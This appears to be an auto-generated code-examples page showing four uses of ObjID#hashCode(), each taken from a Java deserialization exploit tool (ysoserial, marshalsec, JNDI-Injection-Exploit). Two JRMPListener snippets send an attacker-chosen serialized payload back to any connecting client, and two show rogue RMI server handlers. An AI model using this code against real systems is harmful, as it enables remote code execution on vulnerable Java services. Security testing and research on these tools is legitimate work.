Java Code Examples for java.rmi.server.ObjID#hashCode()
The following examples show how to use
java.rmi.server.ObjID#hashCode() .
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example. You may check out the related API usage on the sidebar.
Example 1
| Source File: RMIRefServer.java From JNDI-Injection-Exploit with MIT License | 4 votes |
|
private void doCall ( DataInputStream in, DataOutputStream out ) throws Exception {
ObjectInputStream ois = new ObjectInputStream(in) {
@Override
protected Class<?> resolveClass ( ObjectStreamClass desc ) throws IOException, ClassNotFoundException {
if ( "[Ljava.rmi.jndi.ObjID;".equals(desc.getName()) ) {
return ObjID[].class;
}
else if ( "java.rmi.jndi.ObjID".equals(desc.getName()) ) {
return ObjID.class;
}
else if ( "java.rmi.jndi.UID".equals(desc.getName()) ) {
return UID.class;
}
else if ( "java.lang.String".equals(desc.getName()) ) {
return String.class;
}
throw new IOException(getLocalTime() + " [RMISERVER] >> Not allowed to read object");
}
};
ObjID read;
try {
read = ObjID.read(ois);
}
catch ( IOException e ) {
throw new MarshalException(getLocalTime() + " [RMISERVER] >> unable to read objID", e);
}
if ( read.hashCode() == 2 ) {
// DGC
handleDGC(ois);
}
else if ( read.hashCode() == 0 ) {
if ( handleRMI(ois, out) ) {
this.hadConnection = true;
synchronized ( this.waitLock ) {
this.waitLock.notifyAll();
}
return;
}
}
}
Example 2
| Source File: JRMPListener.java From ysoserial-modified with MIT License | 4 votes |
|
private void doCall ( DataInputStream in, DataOutputStream out, Object payload ) throws Exception {
ObjectInputStream ois = new ObjectInputStream(in) {
@Override
protected Class<?> resolveClass ( ObjectStreamClass desc ) throws IOException, ClassNotFoundException {
if ( "[Ljava.rmi.server.ObjID;".equals(desc.getName())) {
return ObjID[].class;
} else if ("java.rmi.server.ObjID".equals(desc.getName())) {
return ObjID.class;
} else if ( "java.rmi.server.UID".equals(desc.getName())) {
return UID.class;
}
throw new IOException("Not allowed to read object");
}
};
ObjID read;
try {
read = ObjID.read(ois);
}
catch ( java.io.IOException e ) {
throw new MarshalException("unable to read objID", e);
}
if ( read.hashCode() == 2 ) {
ois.readInt(); // method
ois.readLong(); // hash
System.err.println("Is DGC call for " + Arrays.toString((ObjID[])ois.readObject()));
}
System.err.println("Sending return with payload for obj " + read);
out.writeByte(TransportConstants.Return);// transport op
ObjectOutputStream oos = new JRMPClient.MarshalOutputStream(out, this.classpathUrl);
oos.writeByte(TransportConstants.ExceptionalReturn);
new UID().write(oos);
BadAttributeValueExpException ex = new BadAttributeValueExpException(null);
Reflections.setFieldValue(ex, "val", payload);
oos.writeObject(ex);
oos.flush();
out.flush();
this.hadConnection = true;
synchronized ( this.waitLock ) {
this.waitLock.notifyAll();
}
}
Example 3
| Source File: RMIRefServer.java From marshalsec with MIT License | 4 votes |
|
private void doCall ( DataInputStream in, DataOutputStream out ) throws Exception {
ObjectInputStream ois = new ObjectInputStream(in) {
@Override
protected Class<?> resolveClass ( ObjectStreamClass desc ) throws IOException, ClassNotFoundException {
if ( "[Ljava.rmi.server.ObjID;".equals(desc.getName()) ) {
return ObjID[].class;
}
else if ( "java.rmi.server.ObjID".equals(desc.getName()) ) {
return ObjID.class;
}
else if ( "java.rmi.server.UID".equals(desc.getName()) ) {
return UID.class;
}
else if ( "java.lang.String".equals(desc.getName()) ) {
return String.class;
}
throw new IOException("Not allowed to read object");
}
};
ObjID read;
try {
read = ObjID.read(ois);
}
catch ( java.io.IOException e ) {
throw new MarshalException("unable to read objID", e);
}
if ( read.hashCode() == 2 ) {
// DGC
handleDGC(ois);
}
else if ( read.hashCode() == 0 ) {
if ( handleRMI(ois, out) ) {
this.hadConnection = true;
synchronized ( this.waitLock ) {
this.waitLock.notifyAll();
}
return;
}
}
}
Example 4
| Source File: JRMPListener.java From ysoserial with MIT License | 4 votes |
|
private void doCall ( DataInputStream in, DataOutputStream out, Object payload ) throws Exception {
ObjectInputStream ois = new ObjectInputStream(in) {
@Override
protected Class<?> resolveClass ( ObjectStreamClass desc ) throws IOException, ClassNotFoundException {
if ( "[Ljava.rmi.server.ObjID;".equals(desc.getName())) {
return ObjID[].class;
} else if ("java.rmi.server.ObjID".equals(desc.getName())) {
return ObjID.class;
} else if ( "java.rmi.server.UID".equals(desc.getName())) {
return UID.class;
}
throw new IOException("Not allowed to read object");
}
};
ObjID read;
try {
read = ObjID.read(ois);
}
catch ( java.io.IOException e ) {
throw new MarshalException("unable to read objID", e);
}
if ( read.hashCode() == 2 ) {
ois.readInt(); // method
ois.readLong(); // hash
System.err.println("Is DGC call for " + Arrays.toString((ObjID[])ois.readObject()));
}
System.err.println("Sending return with payload for obj " + read);
out.writeByte(TransportConstants.Return);// transport op
ObjectOutputStream oos = new JRMPClient.MarshalOutputStream(out, this.classpathUrl);
oos.writeByte(TransportConstants.ExceptionalReturn);
new UID().write(oos);
BadAttributeValueExpException ex = new BadAttributeValueExpException(null);
Reflections.setFieldValue(ex, "val", payload);
oos.writeObject(ex);
oos.flush();
out.flush();
this.hadConnection = true;
synchronized ( this.waitLock ) {
this.waitLock.notifyAll();
}
}
